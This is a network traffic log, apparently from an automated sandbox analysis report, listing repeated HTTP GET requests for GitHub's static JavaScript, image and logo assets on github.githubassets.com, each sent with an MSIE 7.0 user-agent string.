Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js-56729c905fe2.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_arianotify-polyfill_ariaNotify-polyfill_js-node_modules_github_mi-247092-b9c7cf3107b7.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/environment-2f240f7ed1b3.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/ui_packages_failbot_failbot_ts-aabfa4ec15fe.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_primer_behaviors_dist_esm_index_mjs-4aa4b0e95669.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-f690fd9ae3d5.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_auto-complete-element_dist_index_js-a164c5ea9f62.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_relative-time-element_dist_index_js-6d3967acd51c.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_text-expander-element_dist_index_js-e40ed7658a74.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-d1a841-8f251a0656e7.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-f4b251-f7c3b6081b19.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_stacktrace-parser_dist_s-6b2a62-6fef0f2ad42a.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-eb9d54-74622d897749.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/github-elements-36d7dcef5a08.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/element-registry-f52a50a0449b.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_primer_live-region-element_dis-428401-bb66ac5d7472.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_braintree_browser-detection_dist_browser-detection_js-node_modules_githu-bb80ec-634de60bacfa.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_lit-html_lit-html_js-ce7225a304c5.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_hydro-analytics-client_dist_analytics-client_js-node_modules_gith-f3aee1-e6893db9c19e.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_morphdom_dist_morphdom-e-7c534c-f8a5485c982a.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-893f9f-6cf3320416b8.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-858e043fcf76.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_esm_js-node_modules_stacktrace-pa-a71630-67856ad29bae.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_color-convert_index_js-0e07cc183eed.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_quote-selection_dist_index_js-node_modules_github_session-resume_-9a8cd2-373766bf71f1.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/ui_packages_updatable-content_updatable-content_ts-3f4401350bd7.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_sso_ts-ui_packages-900dde-ab87c1d6c5c8.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/app_assets_modules_github_sticky-scroll-into-view_ts-112600808cf9.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-d0d0a6-6faacedf87fe.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-aeae6fcdf371.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/behaviors-b32b736e8b72.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-bf7e5a3732fd.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/notifications-global-54f34167118d.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_delegated-events_dist_in-bae876-1e5b19a38261.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/marketing-872ff8663359.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/marketing-experiments-6794cdd7dce1.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/home-fa7c9cc8a53c.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/webgl-globe-b8ac95da6496.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_webgl-globe_dist_js_main_js-7ace716f3606.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/react-lib-7b7b5264f6c1.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_primer_react_lib-esm_Fea-39267a-9ffd541aafbc.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_primer_react_lib-esm_Button_Button_js-f36ad879d477.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_primer_react_lib-esm_TooltipV2_Tooltip_js-e39b44f27fbb.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js-540a2acf621f.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_primer_react_lib-esm_KeybindingHint_KeybindingHint_js-node_modules_githu-3fe5e5-779b0a7957e4.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_primer_react_lib-esm_Dialog_Dialog_js-node_modules_primer_react_lib-esm_-34d71e-a36ca1cac968.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/ui_packages_react-core_create-browser-history_ts-ui_packages_react-core_AppContextProvider_ts-ffb979-ed6ff1fbeca4.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/keyboard-shortcuts-dialog-3d3b90edc171.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/sessions-f3ddee0032e4.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-9a621ecbf672.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/thumbnail-31b2a20df6fc.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/play-1844e8414ade.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/hero-desktop-a38b0fd77b6c.webp HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/hero-mobile-7163f4f5de41.webp HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/3m-0151c2fda0ce.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/kpmg-c249f20c5173.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/sap-96248a56d312.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/mercedes-fcf97d2d6ec4.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/pg-f1f19955c4e4.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/telus-df0c2109df99.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
